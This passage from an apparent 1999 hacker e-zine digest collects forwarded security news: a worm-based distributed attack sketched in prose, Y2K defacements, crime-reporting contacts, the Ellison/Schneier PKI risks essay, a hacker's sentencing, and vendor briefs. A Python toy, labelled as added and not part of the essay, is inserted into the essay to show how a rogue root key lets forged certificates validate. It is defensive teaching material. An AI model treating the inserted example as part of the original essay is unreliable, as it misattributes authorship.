      serious.  "Distributed attack tools right now are kind of in their
      infancy," she said.
      
      New improvements could involve a self-replicating "worm" version that
      would automatically spread the attack software to new computers. After
      several generations of spreading, the worm could erase itself from the
      original computers used to launch the worm, severing ties with the true
      origin. The worms could monitor several sites on the Internet for a sign
      that triggers the time and target to attack.
      
      @HWA      
      
32.0  [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Forwarded From: "James J. Capone" <james@ptm.com>
      
      http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2413687,00.html
      
      Groups ask others to take hiatus in response to government plea.
      December 23, 1999
      
      In a seemingly contradictory move, two hacking groups have defaced
      websites to urge others to refrain from hacking over the New Year's
      weekend.

      "... it is our hope that others will also abstain from defacing,
      until the Y2K hysteria has settled down."  -- message posted on defaced
      website

      On Tuesday, a group using the handle Verb0 inserted this message
      into several sites: "Stop hacking for one day, from 31th December 1999 to
      1st January 2000." Online games site Echelon Entertainment was among those
      hit, ZDNN reports.
      
      @HWA      
      
33.0  [ISN] How to report internet related crime
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: Elias Levy <aleph1@SECURITYFOCUS.COM>

      http://www.usdoj.gov/criminal/cybercrime/reporting.htm


                             Computer Crime and
                   Intellectual Property Section (CCIPS)



                    How to Report Internet-Related Crime

     Internet-related crime, like any other crime, should be reported to
     appropriate law enforcement investigative authorities at the local,
     state, federal, or international levels, depending on the scope of
     the crime.  Citizens who are aware of federal crimes should report
     them to local offices of federal law enforcement.

     Some federal law enforcement agencies that investigate domestic
     crime on the Internet include: the Federal Bureau of
     Investigation (FBI), the United States Secret Service, the
     United States Customs Service, and the Bureau of Alcohol,
     Tobacco and Firearms (ATF).  Each of these agencies has offices
     conveniently located in every state to which crimes may be
     reported.  Contact information regarding these local offices may be
     found in local telephone directories.  In general, federal crime
     may be reported to the local office of an appropriate law
     enforcement agency by a telephone call and by requesting the "Duty
     Complaint Agent."

     Each law enforcement agency also has a headquarters (HQ) in
     Washington, D.C., which has agents who specialize in particular
     areas.  For example, the FBI and the U.S. Secret Service both have
     headquarters-based specialists in computer intrusion (i.e.,
     computer hacker) cases.  In fact, the FBI HQ hosts an interagency
     center, the National Infrastructure Protection Center (NIPC),
     created just to support investigations of computer intrusions.  The
     NIPC's general number for criminal investigations is 202-324-0303.
     The U.S. Secret Service's Electronic Crimes Branch may be reached at
     202-435-5850.  The FBI and the Customs Service also have
     specialists in intellectual property crimes (i.e., copyright,
     software, movie, or recording piracy, trademark counterfeiting).
     Customs has a nationwide toll-free hotline for reporting at
     800-BE-ALERT, or 800-232-2538.

     The FBI investigates violations of federal criminal law generally.
     Certain law enforcement agencies focus on particular kinds of
     crime.  Other federal agencies with investigative authority are the
     Federal Trade Commission and the U.S. Securities and Exchange
     Commission.

     To determine some of the federal investigative law enforcement
     agencies that may be appropriate for reporting certain kinds of
     crime, please refer to the following table:


     Type of Crime                       Appropriate federal investigative
                                         law enforcement agencies
     ----------------------------------  ----------------------------------
     Computer intrusion (i.e. hacking)   FBI local office; NIPC
                                         (202-324-0303); U.S. Secret
                                         Service local office

     Password trafficking                FBI local office; NIPC
                                         (202-324-0303); U.S. Secret
                                         Service local office

     Copyright (software, movie,         FBI local office; if imported,
     sound recording) piracy             U.S. Customs Service local office
                                         (800-BE-ALERT, or 800-232-2538)

     Theft of trade secrets              FBI local office

     Trademark counterfeiting            FBI local office; if imported,
                                         U.S. Customs Service local office
                                         (800-BE-ALERT, or 800-232-2538)

     Counterfeiting of currency          U.S. Secret Service local office;
                                         FBI local office

     Child Pornography or Exploitation   FBI local office; if imported,
                                         U.S. Customs Service local office
                                         (800-BE-ALERT, or 800-232-2538)

     Internet fraud                      FBI local office; Federal Trade
                                         Commission; if securities fraud,
                                         Securities and Exchange Commission

     Internet harassment                 FBI local office

     Internet bomb threats               FBI local office; ATF local office

     Trafficking in explosive or         FBI local office; ATF local office
     incendiary devices or firearms
     over the Internet




    Updated page May 21, 1999

    @HWA      
    
34.0 [ISN] Ten risks of PKI (Public Key Infrastructure)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      Forwarded From: "R. A. Hettinga" <rah@shipwright.com>
      Originally To: cryptography@c2.net,
      
      
      Ten Risks of PKI: What You're not Being Told about Public Key
      Infrastructure
      By Carl Ellison and Bruce Schneier
      
      Computer security has been victim of the "year of the..." syndrome.  First
      it was firewalls, then intrusion detection systems, then VPNs, and now
      certification authorities (CAs) and public-key infrastructure (PKI). "If
      you only buy X," the sales pitch goes, "then you will be secure." But
      reality is never that simple, and that is especially true with PKI. 
      
      Certificates provide an attractive business model. They cost almost
      nothing to make, and if you can convince someone to buy a certificate each
      year for $5, that times the population of the Internet is a big yearly
      income. If you can convince someone to purchase a private CA and pay you
      a fee for every certificate he issues, you're also in good shape. It's no
      wonder so many companies are trying to cash in on this potential
      market. With that much money at stake, it is also no wonder that almost all
      the literature and lobbying on the subject is produced by PKI vendors. And
      this literature leaves some pretty basic questions unanswered: What good
      are certificates anyway? Are they secure? For what? In this essay, we hope
      to explore some of those questions. 
      
      Security is a chain; it's only as strong as the weakest link. The security
      of any CA-based system is based on many links and they're not all
      cryptographic. People are involved. 
      
      Does the system aid those people, confuse them or just ignore them?  Does
      it rely inappropriately on the honesty or thoroughness of people? 
      Computer systems are involved. Are those systems secure? These all work
      together in an overall process. Is the process designed to maximize
      security or just profit? 
      
      Each of these questions can indicate security risks that need to be
      addressed. 
      
      Before we start: "Do we even need a PKI for e-commerce?" Open any article
      on PKI in the popular or technical press and you're likely to find the
      statement that a PKI is desperately needed for e-commerce to flourish.
      This statement is patently false. E-commerce is already flourishing, and
      there is no such PKI. Web sites are happy to take your order, whether or
      not you have a certificate. Still, as with many other false statements,
      there is a related true statement:  commercial PKI desperately needs
      e-commerce in order to flourish. In other words, PKI startups need the
      claim of being essential to e-commerce in order to get investors. 
      
      There are risks in believing this popular falsehood. The immediate risk is
      on the part of investors. The security risks are borne by anyone who
      decides to actually use the product of a commercial PKI. 
      
      
      Risk #1: "Who do we trust, and for what?" There's a risk from an imprecise
      use of the word "trust." A CA is often defined as "trusted." 
      
      In the cryptographic literature, this only means that it handles its own
      private keys well. This doesn't mean you can necessarily trust a
      certificate from that CA for a particular purpose: making a micropayment
      or signing a million-dollar purchase order. 
      
      Who gave the CA the authority to grant such authorizations? Who made it
      trusted? 
      
      A CA can do a superb job of writing a detailed Certificate Practice
      Statement, or CPS -- all the ones we've read disclaim all liability and any
      meaning to the certificate -- and then do a great job following that CPS,
      but that doesn't mean you can trust a certificate for your application.
      Many CAs sidestep the question of having no authority to delegate
      authorizations by issuing ID certificates. Anyone can assign names. We
      each do that all the time. This leaves the risk in the hands of the
      verifier of the certificate, if he uses an ID certificate as if it implied
      some kind of authorization. 
      
      There are those who even try to induce a PKI customer to do just that. 
      Their logic goes: (1) you have an ID certificate, (2) that gives you the
      keyholder's name, (3) that means you know who the keyholder is, (4) that's
      what you needed to know. Of course, that's not what you needed to know. In
      addition, the logical links from 1 to 2, 2 to 3 and 3 to 4 are
      individually flawed. [We leave finding those as an exercise for the
      reader.]
      
      
      Risk #2: "Who is using my key?" 
      
      One of the biggest risks in any CA-based system is with your own private
      signing key. How do you protect it? You almost certainly don't own a
      secure computing system with physical access controls, TEMPEST shielding,
      "air wall" network security, and other protections;  you store your
      private key on a conventional computer. There, it's subject to attack by
      viruses and other malicious programs. Even if your private key is safe on
      your computer, is your computer in a locked room, with video surveillance,
      so that you know no one but you ever uses it? If it's protected by a
      password, how hard is it to guess that password? If your key is stored on
      a smart card, how attack-resistant is the card? [Most are very weak.] If
      it is stored in a truly attack-resistant device, can an infected driving
      computer get the trustworthy device to sign something you didn't intend to
      sign? 
      
      This matters mostly because of the term "non-repudiation." Like "trusted,"
      this term is taken from the literature of academic cryptography. There it
      means something very specific: that the digital-signature algorithm is not
      breakable, so a third party cannot forge your signature. PKI vendors have
      latched onto the term and used it in a legal sense, lobbying for laws to
      the effect that if someone uses your private signing key, then you are not
      allowed to repudiate the signature. In other words, under some digital
      signature laws (e.g., Utah and Washington), if your signing key has been
      certified by an approved CA, then you are responsible for whatever that
      private key does. It does not matter who was at the computer keyboard or
      what virus did the signing; you are legally responsible. 
      
      Contrast this with the practice regarding credit cards. Under
      mail-order/telephone-order (MOTO) rules, if you object to a line item on
      your credit card bill, you have the right to repudiate it -- to say you
      didn't buy that -- and the merchant is required to prove that you did. 
      
      
      Risk #3: "How secure is the verifying computer?" 
      
      The previous section showed that the computer holding or driving the
      private key needs to be secure. Long keys don't make up for an insecure
      system because total security is weaker than the weakest component in the
      system. 
      
      The same applies to the verifying computer - the one that uses the
      certificate. 
      
      Certificate verification does not use a secret key, only public keys. 
      
      Therefore, there are no secrets to protect. However, it does use one or
      more "root" public keys. If the attacker can add his own public key to
      that list, then he can issue his own certificates, which will be treated
      exactly like the legitimate certificates. They can even match legitimate
      certificates in every other field except that they would contain a public
      key of the attacker instead of the correct one. 
      
      It doesn't help to hold these root keys in "root certificates." Such a
      certificate is self-signed and offers no increased security. The only
      answer is to do all certificate verification on a computer system that is
      invulnerable to penetration by hostile code or to physical tampering. 
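
      Added example, not part of the essay: a toy model of Risk #3 showing
      that one extra key in the verifier's root list makes a forged
      certificate validate, and that a self-signed root proves nothing. It
      uses textbook RSA over fixed primes (not secure); every name, key and
      certificate is constructed, and the baseline audit is this example's
      assumption, useful only if the baseline is kept off the verifier.

```python
"""Toy model of Risk #3: the verifier's root-key list is the trust anchor.

Textbook RSA over fixed Mersenne primes, for illustration only (not secure).
Every name, key and certificate here is constructed for this example.
"""
import hashlib
import json

E = 65537  # public exponent shared by all toy keys


def make_key(p, q):
    """Return (public, private) textbook-RSA keys built from two primes."""
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))
    return (n, E), (n, d)


def _digest(body, n):
    """Hash the canonical JSON form of a certificate body, reduced mod n."""
    data = json.dumps(body, sort_keys=True).encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def issue(issuer, subject, subject_pub, issuer_priv):
    """Bind subject -> subject_pub in a certificate signed by issuer_priv."""
    body = {"issuer": issuer, "subject": subject, "pub": list(subject_pub)}
    n, d = issuer_priv
    return {**body, "sig": pow(_digest(body, n), d, n)}


def verify(cert, roots):
    """Accept the certificate if ANY key in the root list verifies it."""
    body = {k: cert[k] for k in ("issuer", "subject", "pub")}
    return any(pow(cert["sig"], e, n) == _digest(body, n) for n, e in roots)


def fingerprint(pub):
    """Stable identifier for one root public key."""
    return hashlib.sha256(repr(tuple(pub)).encode()).hexdigest()


def audit(roots, baseline):
    """Return root keys whose fingerprint is missing from the baseline."""
    return [pub for pub in roots if fingerprint(pub) not in baseline]


def demo():
    ca_pub, ca_priv = make_key(2**61 - 1, 2**89 - 1)          # legitimate root
    rogue_pub, rogue_priv = make_key(2**107 - 1, 2**127 - 1)  # attacker's root
    site_pub, _ = make_key(2**13 - 1, 2**17 - 1)              # real server key
    fake_pub, _ = make_key(2**19 - 1, 2**31 - 1)              # impostor's key

    roots = [ca_pub]
    baseline = {fingerprint(ca_pub)}  # assumed to be kept off the verifier

    good = issue("Example Root CA", "www.shop.test", site_pub, ca_priv)
    # Same issuer and subject as `good`; only the key (and signature) differ.
    forged = issue("Example Root CA", "www.shop.test", fake_pub, rogue_priv)
    # A self-signed "root certificate" for the rogue key.
    rogue_root = issue("Example Root CA", "Example Root CA", rogue_pub, rogue_priv)

    results = {
        "good_ok": verify(good, roots),
        "forged_before": verify(forged, roots),
        # Self-signature checks out, so it says nothing about legitimacy.
        "rogue_self_signed_ok": verify(rogue_root, [rogue_pub]),
    }
    roots.append(rogue_pub)  # the one-line change Risk #3 warns about
    results["forged_after"] = verify(forged, roots)
    results["unexpected_roots"] = audit(roots, baseline)
    results["rogue_pub"] = rogue_pub
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "=", value)
```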
      
      
      Risk #4: "Which John Robinson is he?" 
      
      Certificates generally associate a public key with a name, but few people
      talk about how useful that association is. Imagine that you receive the
      certificate of John Robinson. You may know only one John Robinson
      personally, but how many does the CA know? How do you find out if the
      particular John Robinson certificate you received is your friend's
      certificate? You could have received his public key in person or verified
      it in person (PGP allows this), but more likely you received a certificate
      in e-mail and are simply trusting that it is the correct John Robinson.
      The certificate's Common Name will probably be extended with some other
      information, in order to make it unique among names issued by that one CA. 
      
      Do you know that other information about your friend? Do you know what CA
      his certificate should come from? 
      
      When Diffie and Hellman introduced public-key cryptography, they proposed
      a modified telephone directory in which you could find public keys.
      Instead of name, address, and phone number, it would have name, address,
      and public key. If you wanted to find John Robinson's public key you would
      look him up in the directory, get his public key and send him a message
      for his eyes only using that public key. This might have worked with the
      Stanford Computer Science Department phone directory in 1976, but how many
      John Robinsons are in the New York City phone book, much less in a
      hypothetical phone book for the global Internet? 
      
      We grow up in small families where names work as identifiers. By the time
      we're 5 years old, we know that lesson. Names work. That is false in the
      bigger world, but things we learn as toddlers we never forget. In this
      case, we need to think carefully about names and not blindly accept their
      value by the 5-year-old's lessons locked into our memories. 
      
      
      Risk #5: "Is the CA an authority?" 
      
      The CA may be an authority on making certificates, but is it an authority
      on what the certificate contains? For example, an SSL server certificate
      contains two pieces of data of potential security interest: the name of
      the keyholder (usually a corporate name) and the DNS name for the server.
      There are authorities on DNS name assignments, but none of the SSL CAs
      listed in the popular browsers is such an authority. That means that the
      DNS name in the certificate is not an authoritative statement. There are
      authorities on corporate names. These names need to be registered when one
      gets a business license. However, none of the SSL CAs listed in the
      browsers is such an authority. In addition, when some server holds an SSL
      server certificate, it has permission to do SSL. Who granted the authority
      to an SSL CA to control that permission? Is the control of that permission
      even necessary? It serves an economic purpose (generating an income stream
      for CAs) but does it serve a security purpose? What harm is done if an
      uncertified server were allowed to use encryption?  None. 
      
      
      Risk #6: "Is the user part of the security design?" 
      
      Does the application using certificates take the user into account or does
      it concern itself only with cryptography? 
      
      For example, a normal user makes a decision of whether to shop with a
      given SSL-protected Web page based on what is displayed on that page.  The
      certificate is not displayed and does not necessarily have a relation to
      what is displayed. SSL security does not have the ability to control or
      even react to the content of the Web page, only its DNS address. The
      corporate name is not compared to anything the user sees and there are
      some Web pages whose certificate is for a company that does Web hosting,
      not for the company whose logo appears on the displayed page. Users can't,
      and can't be expected to, sort this all out. 
      
      
      Risk #7: "Was it one CA or a CA plus a Registration Authority?" 
      
      Some CAs, in response to the fact that they are not authorities on the
      certificate contents, have created a two-part certification structure:  a
      Registration Authority (RA), run by the authority on the contents, in
      secure communication with the CA that just issues certificates.  Other
      vendors sell CA machinery directly to the content authority. 
      
      The RA+CA model is categorically less secure than a system with a CA at
      the authority's desk. The RA+CA model allows some entity (the CA)  that is
      not an authority on the contents to forge a certificate with that
      contents. Of course, the CA would sign a contract promising not to do so,
      but that does not remove the capability. Meanwhile, since security of a
      chain is weaker than the weakest link, the RA+CA is less secure than
      either the RA or the CA, no matter how strong the CA or how good the
      contract with the CA. Of course, the model with a CA at the authority's
      desk (not at the vendor's site) violates some PKI vendors' business
      models. It's harder to charge for certificates when you sell someone the
      CA code (or they get it for free, as Open Source). 
      
      
      Risk #8: "How did the CA identify the certificate holder?" 
      
      Whether a certificate holds just an identifier or some specific
      authorization, the CA needs to identify the applicant before issuing the
      certificate. 
      
      There was a credit bureau that thought they would get into the CA
      business. 
      
      After all, they had a vast database on people, so, the thinking ran, they
      should be able to establish someone's identity online with ease.  If you
      want to establish identity online, you can do that provided you have a
      shared secret with the subject and a secure channel over which to reveal
      that secret. SSL provides the secure channel. 
      
      The trouble with a credit bureau serving this role is that in their vast
      database there is not one secret shared with the subject. This is because
      credit bureaus are in the business of selling their information to people
      other than the subject. Worse, because credit bureaus do such a good job
      at collecting and selling facts about people, others who might have
      information about a subject are probably hard pressed to find any datum
      shared with the subject that is not already available through some credit
      bureau. This puts at risk commercial CAs that use credit bureau
      information to verify identity on-line; the model just doesn't work. 
      
      Meanwhile, having identified the applicant somehow, how did the CA verify
      that the applicant really controlled the private key corresponding to the
      public key being certified? Some CAs don't even consider that to be part
      of the application process. Others might demand that the applicant sign
      some challenge right there on the spot, while the CA watches. 
      
      
      Risk #9: "How secure are the certificate practices?" 
      
      Certificates aren't like some magic security elixir, where you can just
      add a drop to your system and it will become secure.  Certificates must be
      used properly if you want security. Are these practices designed with
      solid security reasons, or are they just rituals or imitations of the
      behavior of someone else? Many such practices and even parts of some
      standards are just imitations which, when carefully traced back, started
      out as arbitrary choices by people who didn't try to get a real answer. 
      
      How is key lifetime computed? Does the vendor use 1 year, just because
      that's common? A key has a cryptographic lifetime. It also has a theft
      lifetime, as a function of the vulnerability of the subsystem storing it,
      the rate of physical and network exposure, attractiveness of the key to an
      attacker, etc. From these, one can compute the probability of loss of key
      as a function of time and usage. Does the vendor do that computation? What
      probability threshold is used to consider a key invalid? 
      
      Does the vendor support certificate or key revocation? Certificate
      Revocation Lists (CRLs) are built into some certificate standards, but
      many implementations avoid them because they seem to be archaic remnants
      of the newsprint booklets of bad checking account numbers one used to find
      at the supermarket checkout stand. Like those booklets, CRLs are seen as
      too big and too outdated to be relevant. However, if CRLs are not used,
      how is revocation handled? 
      
      If revocation is handled, how is compromise of a key detected in order to
      trigger that revocation? Can revocation be retroactive? That is, can a
      certificate holder deny having made some signature in the past?  If so,
      are signatures dated so that one knows good signatures from suspect ones?
      Is that dating done by a secure timestamp service? 
      
      How long are the generated public keys and why was that length chosen? 
      Does the vendor support 512-bit RSA keys just because they're fast or
      2048-bit keys because someone over there in the corner said he thought it
      was secure? 
      
      Does the proper use of these certificates require user actions? Do users
      perform those actions? For example, when you establish an SSL connection
      with your browser, there's a visual indication that the SSL protocol
      worked and the link is encrypted. But who are you talking securely with?
      Unless you take the time to read the certificate that you received, you
      don't know. 
      
      Even then, you may not know (cf., Risk #4, above) but if you don't even
      look, it's much like going into a private room with the lights off: you
      might know that someone else is there and your conversation is private,
      but until you know who that other person is, you shouldn't reveal any
      secret information. 
      
      
      Risk #10: "Why are we using the CA process, anyway?" 
      
      One PKI vendor employee confided in us a few years ago that they had great
      success selling their PKI solution, but that customers were still unhappy. 
      
      After the CA was installed and all employees had been issued certificates,
      the customer turned to the PKI vendor and asked, "OK, how do we do single
      sign-on?" The answer was, "You don't. That requires a massive change in
      the underlying system software." 
      
      Single Sign-On (SSO) might be the killer app of PKI. Under SSO, you come
      into work in the morning, plug in your smart-card, enter the PIN that
      activates it, and for the rest of the day, you don't have to do any more
      logins. All of that is handled for you by the SSO mechanism. 
      
      Attractive isn't it? Of course, it's attractive. Authentication is a pain. 
      
      Anything we can do to avoid it, we'll jump at. 
      
      Unfortunately, the security value of authentication is all but completely
      defeated by SSO. Authentication is supposed to prove that the user is
      present at the controlling computer, at the time of the test. Under SSO,
      when the user has to rush to the washroom, any passing person can walk up
      to that user's computer and sign on someplace via the SSO mechanism. 
      
      So, why are so many jumping at the CA process with such fervor? Do they
      use certificates out of empty ritual, just because the other guy does and
      it's the thing to do this year? Do they do it in order to pass the
      liability buck: to be able to blame the PKI experts if any insecurity
      sneaks through? 
      
      We are not that cynical. Our assessment is that security is very
      difficult, both to understand and to implement. Busy system administrators
      and IT managers don't have the time to really understand security. They
      read the trade press. The trade press, influenced by PKI vendors, sings
      the praises of PKIs. And PKI vendors know what busy people need: a
      minimal-impact solution. "Here, buy this one thing and it will make you
      secure." So that's what they offer. Reality falls far short of this
      promise, but then, this is a business and the prominent voices are those
      with something to sell.  Caveat emptor. 
      
      
      Bruce Schneier is the author of Applied Cryptography, the Blowfish and
      Twofish encryption algorithms, and dozens of research papers and articles
      on cryptography and computer security. He is CTO of Counterpane Internet
      Security, Inc., a managed security service company offering leading-edge
      expertise in the fields of intrusion detection and prevention, preemptive
      threat discovery, forensic research, and organizational IT systems
      analysis. 
      
      You can subscribe to his free monthly e-mail newsletter, Crypto-Gram, at
      http://www.counterpane.com
      
      Carl M. Ellison is a Senior Security Architect for Intel Corporation, with
      special focus on cryptography, cryptographic access control and public key
      certificates. Prior to the focus on cryptography, his earlier professional
      computer science career focused on system design with special emphasis on
      distributed and networked systems. 
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA
      
35.0  [ISN] Forbes says he'll ditch all crypto export controls
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: Declan McCullagh <declan@well.com>

        http://www.wired.com/news/politics/0,1283,33049,00.html

        Forbes, the Privacy Candidate
        by Declan McCullagh (declan@wired.com)
        11:40 a.m. 17.Dec.1999 PST

        WASHINGTON -- If you're the kind of
        person who frets about ever-eroding
        privacy rights, Steve Forbes wants to be
        your president.

        In the first campaign speech by any
        presidential candidate on the topic, the
        publishing luminary left nothing to the
        imagination: Voracious databases know
        more about you than your mother does,
        and the Clinton administration is
        particularly to blame.

        "Bit by bit, day by day, we are being
        seduced by politicians promising security
        as they take away our sovereignty,
        promising prosperity as they gnaw away
        at our privacy," Forbes told a crowd at
        the conservative Free Congress
        Foundation on Thursday afternoon.

        Hearing someone grouse about Bill Clinton
        and Al Gore at a Free Congress
        Foundation event is about as remarkable
        as a Macy's post-holiday sale, but Forbes'
        plan to muzzle federal infocrats is one
        that even the ACLU can cheer.

        [...]

        Much of Forbes' speech was devoted to
        how the executive branch is "engaged in
        the greatest assault" on privacy in the
        history of the United States, a claim the
        Clinton administration dismissed on Friday
        as campaign hyperbole.

        [...]

        @HWA 
      
36.0   [ISN] Zyklon claims his crime was "no big deal"   
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       http://www.techserver.com/noframes/story/0,2294,500060584-500100049-500415296-0,00.html

      WASHINGTON (November 22, 1999 8:10 p.m. EST http://www.nandotimes.com)
      - At age 19, hacker Eric Burns has already wandered the underpinnings
      of the Web where few had gone before, including an illicit visit
      inside computers at the White House in May.
      
      "I didn't really think it was too much of a big deal," said Burns -
      hacker name Zyklon - who admitted responsibility for some of the most
      sensational attacks on corporate and government Internet sites.
      
      Burns pleaded guilty Friday in U.S. District Court in Alexandria, Va.,
      to a single felony count of intentionally hacking into one computer,
      but admitted involvement in the spate of electronic assaults.
      
      Now Burns is facing 15 months in federal prison and $36,240 in
      restitution. And under a judge's orders last week, he won't be allowed
      to touch a computer for three years after his release.
      
      Burns was initially indicted May 13 on charges of breaking into
      computers for the U.S. Information Agency and two businesses. That was
      four days after the White House Internet site - at www.whitehouse.gov
      - was electronically assaulted.
      
      Initially, Burns said he wasn't directly involved in that White House
      attack in which the altered site included the phrase, "following peeps
      get some shouts" - hacker slang for "hello" - and listed a dozen
      names, including Zyklon.
      
      Zyklon is the name of a poison gas used by Nazis against Jews.
      
      But federal prosecutors said Burns boasted of the White House attack
      online even before it happened, and Burns admitted at his sentencing
      Friday he was among three people who altered the site briefly to show
      a black Web page with the names of hacker organizations, along with
      messages, "Your box was own3d," and, "Stop all the war."
      
      He said Monday in a telephone interview from his home in Shorewood,
      Wash., that he will refuse to identify his two partners to the Secret
      Service, partly because he believes the criminal penalties for hackers
      are too steep.  His punishment didn't fit his crime, he insisted.
      
      "I'd rather not have what happened to me happen to anyone else," Burns
      said. "I don't really agree with the kind of sentencing range there is
      for the crime."
      
      The seriousness of the trouble facing Burns didn't sink in, he
      admitted, even after FBI agents raided his home and took his computer.
      
      "I just gave them a confession," Burns said. "I didn't think it was
      too big a deal."
      
      Prosecutors indicated otherwise.
      
      U.S. Attorney Helen Fahey said Burns attacked computers on the
      Internet controlling Web sites for NATO, a U.S. embassy and consulates
      and even Vice President Al Gore. The USIA Web site was shut down for
      eight days after Burns' attack.
      
      All told, the attacks cost the government and businesses more than
      $40,000, prosecutors said.
      
      When the White House site was vandalized, experts "had to shut down
      the Web server, disconnect both the public and private computer
      networks from the Internet for two days and reconfigure the computer
      system,"  Fahey said in a statement.
      
      Burns expects to report to federal prison in four to six weeks, which
      he hopes will let him spend Thanksgiving and the holidays with his
      family. With time off for good behavior, his lawyer told him he might
      spend as few as 13 months behind bars.
      
      Although his sentence says he won't be allowed to use a computer
      during three years of supervised probation when he's released, he's
      already planning to ask his probation officer whether he'll be allowed
      to use one for work.
      
      "I really don't know" how the arrest and time in prison will affect
      his future, Burns said. "Hopefully, it won't impact it too bad."
      
      
      ==
      Some day, on the corporate balance sheet, there will be
      an entry which reads, "Information"; for in most cases
      the information is more valuable than the hardware which
      processes it. -- Adm. Grace Murray Hopper, USN Ret.
      ==
      http://www.dis.org/erehwon/
      
      @HWA
      
37.0  [ISN] Security Wire Digest Volume 1
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From: infosecurity@emailch.com


      SECURITY WIRE DIGEST, VOL. 1, NO. 8, NOV. 22, 1999
      
      Security Wire Digest is a weekly e-mail newsletter
      brought to you by Information Security magazine, an
      ICSA.net publication.
      
      =====================================================
      
      CONTENTS
      
      **THANKSGIVING NOTICE**
      
      1. INFOSEC WEEK IN REVIEW
      *Enterprise Security Management a Hot Topic at CSI
      
      2. INDUSTRY BRIEFS
      *HP VirtualVault 4.0 Goes Mainstream
      *eNABLE Supports Rainbow and RSA
      *Celo Debuts CeloCom VPN Suite
      *RSA Joins Trusted Computing Platform Alliance
      *Entegrity Partners With Identrus
      *Schlumberger Introduces Easyflex Corporate
      *Identix BioLogon Available Online
      *Tumbleweed Acquires Worldtalk
      
      3. HAPPENINGS
      
      4. SECURITY PERSPECTIVES
      *Exposing Hacking With Hacking Exposed
      By Ben Rothke
      
      =====================================================
      THIS ISSUE OF SECURITY WIRE DIGEST IS SPONSORED BY...
      Agilent Technology SFProtect NT Security Scanner
      
      SFProtect NT Security Scanner is the ONE software
      solution that empowers you to find and fix NT
      vulnerabilities with one single application. How?
      SFProtect scans the NT operation system, IIS and SQL
      version 6.5 and 7.0 for security vulnerabilities. Once
      identified, problems can be fixed with SFProtect's unique
      Intellifix feature. You can also get e-mail notification
      of audit results, reports in HTML, remote operation
      through a secure ODBC link and more.
      
      Download your free trial version today:
      http://www.agilent.com/comms/netsecurity9
      =====================================================
      
      **THANKSGIVING NOTICE**
      Security Wire Digest will take a one-issue hiatus next
      week due to U.S. Thanksgiving festivities. The next
      Security Wire Digest will be delivered on Monday, Dec.
      6.
      
      =====================================================
      
      1. INFOSEC WEEK IN REVIEW
      
      *ENTERPRISE SECURITY ADMINISTRATION A HOT TOPIC AT CSI
      Easing the burdens of security administration is on the
      minds of lots of security practitioners these days. As
      organizations introduce new technologies and services to
      network infrastructures, security admins and managers are
      faced with the complex task of not only finding and
      fixing new vulnerabilities before they are exploited, but
      identifying and responding to breaches after they've
      already occurred.
      
      Last week at CSI's annual security conference, a number
      of vendors introduced new tools and enhancements to
      existing products that respond to this need by
      automating, centralizing and simplifying the task of
      enterprise risk management and intrusion response.
      
      BindView Development Corp. (http://www.bindview.corp)
      announced version 2.0 of its HackerShield software, an
      enterprise vulnerability scanner that allows operators to
      find and close security holes in servers, workstations
      and network devices across a heterogeneous network.
      Available in December, version 2.0 is engineered with the
      increasing number of security newbies in mind; while its
      database of vulnerability scripts is as extensive as that
      of other enterprise-class scanners, the tool deploys fast
      and is easy to configure and use. It includes a handy
      Scan Wizard that walks new users through the first-time
      scanning process, and when a vulnerability or breach is
      identified, it uses plain language to spell out the
      degree of risk and appropriate response procedures.
      
      BMC Software (http://www.bmc.com) rolled out an
      enhancement to its CONTROL-SA security suite that extends
      the reach of its centralized management offering.
      CONTROL-SA/Links allows admins and managers to create
      event definitions and automated rulesets for disparate
      parts of the enterprise network. For instance, security
      managers can integrate human resource applications within
      the security administration process. If a new employee
      joins the organization, CONTROL-SA/Links can be directed
      to intercept certain HR transactions and automatically
      initiate end-user rights for the new employee.
      
      By year-end, newcomer e-Security
      (http://www.esecurityinc.com) plans to introduce a
      "Management Desk" to its Open e-Security Platform (OeSP)
      to help operators respond to identified security
      breaches. OeSP's competitive differentiator is that it
      consolidates reports of security "exceptions" in
      real-time from fragmented security products -- no matter
      the product brand. When the central console receives
      notice of an intrusion, the Management Desk will
      automatically generate a step-by-step response outline
      according to the organization's predefined security
      policy, contact appropriate personnel and monitor
      security response procedures.
      
      Version 5.5 of Network Associates's (http://www.nai.com)
      CyberCop vulnerability scanner also automates several
      administrative tasks. Its AutoFix feature automatically
      repairs more than 700 identified network, protocol and
      application vulnerabilities, and its AutoUpdate feature
      lets admins update the scanning engine and vulnerability
      database on a regular, automatic basis.
      
      Computer Associates (http://www.cai.com) announced an
      access control enhancement to its eTrust family of
      security tools. With the simultaneous release of eTrust
      Access Control 5.0 for UNIX and eTrust Access Control 4.1
      for NT, CA provides users with a centralized system for
      creating, distributing and managing access. The tools
      also operate within CA's flagship enterprise management
      system, Unicenter TNG.
      
      Finally, BullSoft (http://www.bullsoft.com) announced
      that it has integrated storage management capabilities
      into its OpenMaster secure e-infrastructure and
      enterprise management software. The added capability
      allows organizations to select and configure
      best-of-breed Internet and enterprise-wide storage
      resources, and manage them all from a centralized
      OpenMaster console. OpenMaster storage management
      configuration starts at $18,900, which includes core
      services such as network monitoring, alarm management and
      network discovery.
      
      =====================================================
      
      2. INDUSTRY BRIEFS
      
      *HP VIRTUALVAULT 4.0 GOES MAINSTREAM
      Hewlett-Packard last week announced major enhancements
      and new pricing to its Praesidium VirtualVault 4.0
      trusted Web-server platform. The latest version of
      VirtualVault provides application-level protection for
      such b-to-b applications as SAP, Oracle and Ariba; and
      supports a broader range of enterprise server platforms,
      including Sun, Microsoft, Compaq and IBM. Optional BMC
